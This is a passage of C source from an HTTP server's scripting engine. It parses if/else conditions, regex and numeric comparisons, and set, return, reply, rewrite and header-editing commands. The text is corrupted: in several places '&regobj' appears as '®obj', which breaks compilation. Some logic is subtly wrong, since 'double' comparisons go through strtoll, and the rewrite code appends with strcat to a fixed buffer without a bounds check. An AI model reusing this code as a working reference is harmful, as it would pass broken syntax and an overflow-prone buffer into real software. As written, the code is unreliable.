if (adval >= bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) >= 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "<") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 < bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
if (adval < bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) < 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "<=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 <= bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
if (adval <= bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) <= 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "!=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 != bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
if (adval != bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) == 0) ? 0 : 1;
} else if (strcasecmp(cmpsym, "^~") == 0) {
return (strncasecmp(pa, pb, strlen(pb)) == 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "~") == 0) {
#ifdef UNIX
memset(®obj, 0, sizeof(regobj));
regcomp(®obj, pb, REG_EXTENDED);
ret = regexec(®obj, pa, 4, pmat, 0);
regfree(®obj);
if (ret == 0) return 1;
if (ret == REG_NOMATCH) return 0;
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(pb, 0, &errstr, &erroff, NULL);
if (!regobj) return 0;
ret = pcre_exec(regobj, NULL, pa, strlen(pa), 0, 0, ovec, 36);
pcre_free(regobj);
if (ret > 0) return 1;
if (ret <= 0) return 0;
#endif
} else if (strcasecmp(cmpsym, "~*") == 0) {
#ifdef UNIX
memset(®obj, 0, sizeof(regobj));
regcomp(®obj, pb, REG_EXTENDED | REG_ICASE);
ret = regexec(®obj, pa, 4, pmat, 0);
regfree(®obj);
if (ret == 0) return 1;
if (ret == REG_NOMATCH) return 0;
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(pb, PCRE_CASELESS, &errstr, &erroff, NULL);
if (!regobj) return 0;
ret = pcre_exec(regobj, NULL, pa, strlen(pa), 0, 0, ovec, 36);
pcre_free(regobj);
if (ret > 0) return 1;
if (ret <= 0) return 0;
#endif
}
return 0;
}
/* if ( $request_header[content-type] == "text/html" ) */
static int script_if_objcmp_parse (void * vhsc, char * pbgn, int len, char ** pterm,
char * pa, int palen, char * pcmp, char * pb, int pblen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pend = NULL;
char * poct = NULL;
char * avar = NULL;
char * bvar = NULL;
int alen = 0;
int blen = 0;
char cmpsym[8];
int cmplen = 0;
if (pterm) *pterm = pbgn;
if (!hsc) return 0;
if (pbgn && len > 0) {
pend = pbgn + len;
pbgn = skipOver(pbgn, pend - pbgn, " \t\r\n\f\v", 6);
if (pbgn > pend) {
if (pterm) *pterm = pbgn;
return 0;
}
}
if (pa && palen > 0) {
avar = pa; alen = palen;
} else {
poct = goto_symbol_end(pbgn, pend - pbgn);
avar = pbgn; alen = poct - pbgn;
if (pterm) *pterm = poct;
pbgn = skipOver(poct, pend - poct, " \t\r\n\f\v", 6);
if (pbgn > pend) {
return 2; //indicate only one obj
}
}
if (pcmp) {
str_secpy(cmpsym, sizeof(cmpsym)-1, pcmp, strlen(pcmp));
} else {
/* all kinds of comparing symbol: == != ~ ^~ ~* > < >= <= */
for (poct = pbgn; poct < pend; poct++) {
if (is_exp_char(*poct)) break;
if (ISSPACE(*poct)) break;
}
cmplen = poct - pbgn;
if (poct > pbgn)
str_secpy(cmpsym, sizeof(cmpsym)-1, pbgn, poct-pbgn);
else
cmpsym[0] = '\0';
pbgn = skipOver(poct, pend - poct, " \t\r\n\f\v", 6);
if (pbgn > pend) {
return 2; //indicate only one obj
}
}
cmplen = strlen(cmpsym);
if (pa && palen > 0) {
bvar = pa; blen = palen;
} else {
/* extracting the second variable */
poct = goto_symbol_end(pbgn, pend - pbgn);
bvar = pbgn; blen = poct - pbgn;
if (pterm) *pterm = poct;
}
if (cmplen <= 0 || cmplen > 2) return 100;
if (cmplen == 1 && (cmpsym[0] != '~' && cmpsym[0] != '>' && cmpsym[0] != '<'))
return 101;
if (cmplen == 2 && (cmpsym[0] != '=' || cmpsym[1] != '=') &&
(cmpsym[0] != '!' || cmpsym[1] != '=') &&
(cmpsym[0] != '^' || cmpsym[1] != '~') &&
(cmpsym[0] != '~' || cmpsym[1] != '*') &&
(cmpsym[0] != '>' || cmpsym[1] != '=') &&
(cmpsym[0] != '<' || cmpsym[1] != '=') )
{
return 102;
}
return script_if_objcmp(hsc, avar, alen, cmpsym, bvar, blen);
}
int script_if_condition_parse (void * vhsc, char * cond, int condlen, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int condnum = 0;
int reverse = 0;
int condval = 0;
int condcmp = 0; //0-none 1-and(&&) 2-or(||)
int ret = 0;
if (!hsc) return 0;
if (!cond) return 0;
if (condlen < 0) condlen = strlen(cond);
if (condlen <= 0) return 0;
pbgn = cond;
pend = cond + condlen;
pbgn = skipOver(pbgn, condlen, " \t\r\n\f\v", 6);
if (pbgn >= pend) return 0;
pexpend = rskipOver(pend-1, pend-pbgn, " \t\r\n\f\v", 6);
pend = pexpend + 1;
for ( ; pbgn < pend; ) {
pbgn = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pend) return condval;
if (pend - pbgn > 2 && pbgn[0] == '-' &&
(pbgn[1] == 'f' || pbgn[1] == 'd' || pbgn[1] == 'e' || pbgn[1] == 'x'))
{
ret = script_if_file_parse(hsc, pbgn, pend-pbgn, &poct);
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
}
else if (pend - pbgn > 3 && pbgn[0] == '!' && pbgn[1] == '-' &&
(pbgn[2] == 'f' || pbgn[2] == 'd' || pbgn[2] == 'e' || pbgn[2] == 'x'))
{
ret = script_if_not_file_parse(hsc, pbgn, pend-pbgn, &poct);
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
} else if (pbgn[0] == '(') {
poct = skipToPeer(pbgn, pend-pbgn, '(', ')');
if (*poct != ')') return condval;
pbgn = skipOver(pbgn+1, poct-pbgn-1, " \t\r\n\f\v", 6);
if (pbgn >= poct) {
pbgn = poct + 1;
continue;
}
ret = script_if_condition_parse(hsc, pbgn, poct-pbgn, &pval);
if (ret >= 2) { /* the content in bracket will be considered as one variable-object */
/* if ( ($request_path) != "/opt/hls.html" ) */
/* ^ */
/* | */
ret = script_if_objcmp_parse(hsc, poct+1, pend-poct-1, &pval, pbgn, pval-pbgn, NULL, NULL, 0);
if (ret >= 2) {
pbgn = pval;
condcmp = 0;
reverse = 0;
condnum++;
continue;
}
}
pbgn = poct + 1;
if (ret == 0 || ret == 1) {
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
condcmp = 0;
reverse = 0;
condnum++;
}
} else if (pbgn[0] == '!') {
reverse = 1;
pbgn++;
continue;
} else {
ret = script_if_objcmp_parse(hsc, pbgn, pend-pbgn, &poct, NULL, 0, NULL, NULL, 0);
if (ret == 2) { //only one varobj, eg. if (($request_path) != "/opt/abc.txt") {
pval = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pval >= pend) {
if (pterm) *pterm = poct;
if (condnum < 1) return 2;
}
get_var_value(hsc, pbgn, poct-pbgn, buf, sizeof(buf)-1, 1);
pval = trim_var(buf, strlen(buf));
if (strlen(pval) <= 0 ||
strcasecmp(pval, "0") == 0 ||
strcasecmp(pval, "false") == 0 ||
strcasecmp(pval, "no") == 0)
ret = 0;
else ret = 1;
if (condnum > 0) {
} else {
}
}
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
}
pbgn = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pend) break;
if (pend - pbgn >= 2) {
if (pbgn[0] == '&' && pbgn[1] == '&') {
condcmp = 1; // AND operation
pbgn += 2;
} else if (pbgn[0] == '|' && pbgn[1] == '|') {
condcmp = 2; // OR operation
pbgn += 2;
} else if (adf_tolower(pbgn[0]) == 'o' && adf_tolower(pbgn[1]) == 'r') {
condcmp = 2; // OR operation
pbgn += 2;
}
}
if (pend - pbgn >= 3) {
if (adf_tolower(pbgn[0]) == 'a' && adf_tolower(pbgn[1]) == 'n' && adf_tolower(pbgn[2]) == 'd') {
condcmp = 1; // AND operation
pbgn += 3;
}
}
if (condcmp == 0) break;
}
return condval;
}
char * script_if_parse (void * vhsc, char * p, int slen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int condval = 0;
uint8 ifbody_exec = 0;
if (!hsc) return p;
if (!p) return NULL;
if (slen < 0) slen = strlen(p);
if (slen <= 2) return p;
if (str_ncmp(p, "if", 2) != 0) return p;
/* if (cond) {...} */
pbgn = p + 2;
pend = p + slen;
while (pbgn < pend) {
condval = 0;
/* skip 'if' and following space, to condition */
poct = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (poct >= pend || *poct != '(') {
/* condition invalid in 'if (cond)' expression, find the end of the expression */
pbgn = skipTo(poct, pend-poct, ";", 1);
return pbgn;
}
pexpend = skipTo(poct, pend-poct, ";", 1);
pval = skipToPeer(poct, pexpend-poct, '(', ')');
if (*pval != ')') {
return pexpend;
}
if (!ifbody_exec) {
condval = script_if_condition_parse(hsc, poct + 1, pval - poct - 1, NULL);
}
/* skip the condition block, stop to the if body */
pbgn = skipOver(pval+1, pend-pval-1, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn == '{') {
/* if (cond) { ... } find { and assign to pbgn */
pval = skipToPeer(pbgn, pend-pbgn, '{', '}');
if (!ifbody_exec && condval) {
http_script_parse_exec(hsc, pbgn + 1, pval - pbgn - 1);
ifbody_exec = 1;
}
if (*pval == '}') pval++;
} else if (pend - pbgn >= 2 && str_ncmp(pbgn, "if", 2) == 0) {
/* if (cond) if (cond2) {... } */
pval = script_if_parse(hsc, pbgn, pend-pbgn);
} else {
/* if (cond) ...; find expression end flag ; */
pval = skipTo(pbgn, pend-pbgn, ";", 1);
if (!ifbody_exec && condval) {
http_script_parse_exec(hsc, pbgn, pval - pbgn);
ifbody_exec = 1;
}
if (*pval == ';') pval++;
}
if (hsc->exitflag)
return pval;
/* now skip all 'else if' and 'else', look for the end of 'if' expression */
/* if (cond) { ... } else { ... }
if (cond) { ... } else if { ... }
if (cond) { ... } ... */
pbgn = skipOver(pval, pend-pval, "; \t\r\n\f\v", 7);
if (pbgn >= pend) return pbgn;
/* else if (cond) { ... } or else { ... } */
if (pend - pbgn >= 4 && str_ncmp(pbgn, "else", 4) == 0) {
poct = skipOver(pbgn+4, pend-pbgn-4, " \t\r\n\f\v", 6);
if (poct >= pend) return poct;
if (pend - poct > 2 && str_ncmp(poct, "if", 2) == 0) {
/* else if (...) */
pbgn = poct + 2;
continue;
} else if (pend - poct > 1 && *poct == '{') {
/* else { ... } */
pval = skipToPeer(poct, pend-poct, '{', '}');
if (!ifbody_exec && condval == 0) {
http_script_parse_exec(hsc, poct + 1, pval - poct - 1);
ifbody_exec = 1;
}
if (*pval == '}') pval++;
return pval;
} else {
/* else ... */
pval = skipTo(poct, pend-poct, ";", 1);
if (!ifbody_exec && condval == 0) {
http_script_parse_exec(hsc, poct, pval - poct);
ifbody_exec = 1;
}
if (*pval == ';') pval++;
return pval;
}
} else {
/* no else existing, if expression end! */
return pbgn;
}
}
return pbgn;
}
char * script_assignment_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char varname[512];
char value[4096];
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* $forward_addr = $remote_addr;
$forward_addr = "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (*pbgn != '$') return pexpend;
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_name(pbgn, poct-pbgn, varname, sizeof(varname)-1);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* = */
for (poct = pbgn; poct < pexpend; poct++) {
if (ISSPACE(*poct)) break;
if (is_exp_char(*poct)) break;
}
if (*pbgn != '=' || poct - pbgn > 1) {
return pexpend;
}
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
http_msg_var_set(hsc->msg, varname, value, strlen(value));
return pexpend;
}
char * script_set_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char varname[512];
char value[4096];
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* set $forward_addr $remote_addr;
set $forward_addr "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 3) return pexpend;
if (strncasecmp(pbgn, "set", 3) != 0) return pexpend;
pbgn += 3;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_name(pbgn, poct-pbgn, varname, sizeof(varname)-1);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
http_msg_var_set(hsc->msg, varname, value, strlen(value));
return pexpend;
}
char * script_return_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
int ret = 0;
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* return $forward_addr;
return "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 6) return pexpend;
if (strncasecmp(pbgn, "return", 6) != 0) return pexpend;
pbgn += 6;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
if (poct > pbgn) {
/* get rid of ' or " on the leading or tail side */
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
ret = http_var_copy(hsc->msg, pbgn, poct-pbgn, NULL,
0, NULL, 0, hsc->vname, hsc->vtype);
if (ret > 0) {
hsc->retval = kalloc(ret + 1);
hsc->retvallen = ret;
http_var_copy(hsc->msg, pbgn, poct-pbgn, hsc->retval, ret,
NULL, 0, hsc->vname, hsc->vtype);
}
hsc->exitflag = 1;
return pexpend;
}
char * script_reply_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int status = 0;
int ret = 0;
int vallen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* reply status_code [ URL or MsgBody ] */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 5) return pexpend;
if (strncasecmp(pbgn, "reply", 5) != 0) return pexpend;
pbgn += 5;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
/* check if all octets are digits */
for (pval = pbgn; pval < poct; pval++) {
if (!isdigit(*pval)) return pexpend;
}
status = str_to_int(pbgn, poct-pbgn, 10, NULL);
/* extracting redirect URL or MSG body */
pval = NULL;
pbgn = skipOver(poct, pexpend-poct, " \t\r\n\f\v", 6);
poct = goto_symbol_end(pbgn, pexpend - pbgn);
if (poct > pbgn) {
/* get rid of ' or " on the leading or tail side */
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (pbgn < pexpend && poct > pbgn) {
ret = http_var_copy(hsc->msg, pbgn, poct-pbgn, NULL, 0,
NULL, 0, hsc->vname, hsc->vtype);
if (ret > 0) {
pval = kalloc(ret + 1);
vallen = ret;
vallen = http_var_copy(hsc->msg, pbgn, poct-pbgn, pval, ret,
NULL, 0, hsc->vname, hsc->vtype);
if (vallen >= 2 && (pval[0] == '"' || pval[0] == '\'')) {
if (pval[vallen-1] == pval[0]) {
pval++;
vallen -= 2;
}
}
}
}
if (status >= 300 && status < 400) {
if (pval && vallen > 0) {
msg->RedirectReply(msg, status, pval);
} else {
return pexpend;
}
} else {
if (pval && vallen > 0) {
msg->AddResContent(msg, pval, vallen);
}
msg->SetStatus(msg, status, NULL);
msg->Reply(msg);
}
if (pval) kfree(pval);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
}
char * script_rewrite_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
char regstr[512];
char replace[2048];
char flag[64];
char dsturi[2048];
int ret, dstlen;
ckstr_t pmatstr[32];
int i, matnum = 0;
#ifdef UNIX
char uri[2048];
regex_t regobj = {0};
regmatch_t pmat[32];
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * regobj = NULL;
char * errstr = NULL;
int erroff = 0;
int ovec[36];
#endif
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* rewrite regex replacement [flag] */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 7) return pexpend;
if (strncasecmp(pbgn, "rewrite", 7) != 0) return pexpend;
pbgn += 7;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting regex string */
regstr[0] = '\0';
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(regstr, sizeof(regstr)-1, pbgn, poct-pbgn);
}
/* extracting replacement string */
pbgn = skipOver(pval, pexpend-pval, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
replace[0] = '\0';
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(replace, sizeof(replace)-1, pbgn, poct-pbgn);
}
flag[0] = '\0';
/* extracting flag string */
pbgn = skipOver(pval, pexpend-pval, " \t\r\n\f\v", 6);
if (pbgn < pexpend) {
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(flag, sizeof(flag)-1, pbgn, poct-pbgn);
}
}
#ifdef UNIX
if (regcomp(®obj, regstr, REG_EXTENDED | REG_ICASE) != 0) {
regfree(®obj);
return pexpend;
}
str_secpy(uri, sizeof(uri)-1, msg->req_path, msg->req_pathlen);
ret = regexec(®obj, uri, 32, pmat, 0);
if (ret == 0) {
for (i = 0, matnum = 0; i < 32; i++) {
if (pmat[i].rm_so >= 0) {
pmatstr[matnum].p = uri + pmat[i].rm_so;
pmatstr[matnum].len = pmat[i].rm_eo - pmat[i].rm_so;
matnum++;
continue;
}
break;
}
regfree(®obj);
} else {
regfree(®obj);
return pexpend;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(regstr, PCRE_CASELESS, &errstr, &erroff, NULL);
if (!regobj) return pexpend;
ret = pcre_exec(regobj, NULL, msg->req_path, msg->req_pathlen, 0, 0, ovec, 36);
if (ret <= 0) {
pcre_free(regobj);
return pexpend;
}
for (i = 0, matnum = 0; i < ret; i++) {
pmatstr[matnum].p = msg->req_path + ovec[2 * i];
pmatstr[matnum].len = ovec[2 * i + 1] - ovec[2 * i];
matnum++;
}
pcre_free(regobj);
#endif
dsturi[0] = '\0';
http_var_copy(msg, replace, strlen(replace), dsturi, sizeof(dsturi)-1,
pmatstr, matnum, hsc->vname, hsc->vtype);
if ((dstlen = strlen(dsturi)) <= 0) return pexpend;
if (dsturi[dstlen - 1] != '?') {
if (memchr(dsturi, '?', dstlen) == NULL)
strcat(dsturi, "?");
else
strcat(dsturi, "&");
dstlen += 1;
str_secpy(dsturi + dstlen, sizeof(dsturi)-1-dstlen,
msg->req_query, msg->req_querylen);
dstlen = strlen(dsturi);
} else{
dsturi[dstlen - 1] = '\0';
dstlen--;
}
if (strcasecmp(flag, "redirect") == 0) {
msg->RedirectReply(msg, 302, dsturi);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
} else if (strcasecmp(flag, "permanent") == 0) {
msg->RedirectReply(msg, 301, dsturi);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
}
if (strcasecmp(flag, "last") == 0) {
msg->SetDocURL(msg, dsturi, dstlen, 0, 0);
hsc->exitflag = 1;
} else if (strcasecmp(flag, "forward") == 0 || strcasecmp(flag, "proxy") == 0) {
/* dsturi must be an absolute URL, do not re-instantizte location */
if (msg->SetDocURL(msg, dsturi, dstlen, 0, 1) > 0)
msg->req_url_type = 1;
msg->proxied = 1;
} else if (strcasecmp(flag, "break") == 0) {
/* do not re-instantiate location after setting DocURI, go on executing next line */
msg->SetDocURL(msg, dsturi, dstlen, 0, 1);
} else { //no flag
/* do not re-intantiate location after setting DocURI.
when all scripts executed, re-intantizte location at last */
msg->SetDocURL(msg, dsturi, dstlen, 0, 1);
hsc->reloc = 1;
}
return pexpend;
}
char * script_add_req_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
char value[4096];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addReqHeader x-forward-ip $remote_addr;
addReqHeader x-Real-IP "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addReqHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
msg->AddReqHdr(msg, name, strlen(name), value, strlen(value));
return pexpend;
}
char * script_add_res_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
char value[4096];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addResHeader x-forward-ip $remote_addr;
addResHeader x-Real-IP "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addResHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
msg->AddResHdr(msg, name, strlen(name), value, strlen(value));
return pexpend;
}
char * script_del_req_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* delReqHeader x-forward-ip;
delReqHeader x-Real-IP; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "delReqHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
msg->DelReqHdr(msg, name, strlen(name));
return pexpend;
}
char * script_del_res_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
if (!hsc) return p;
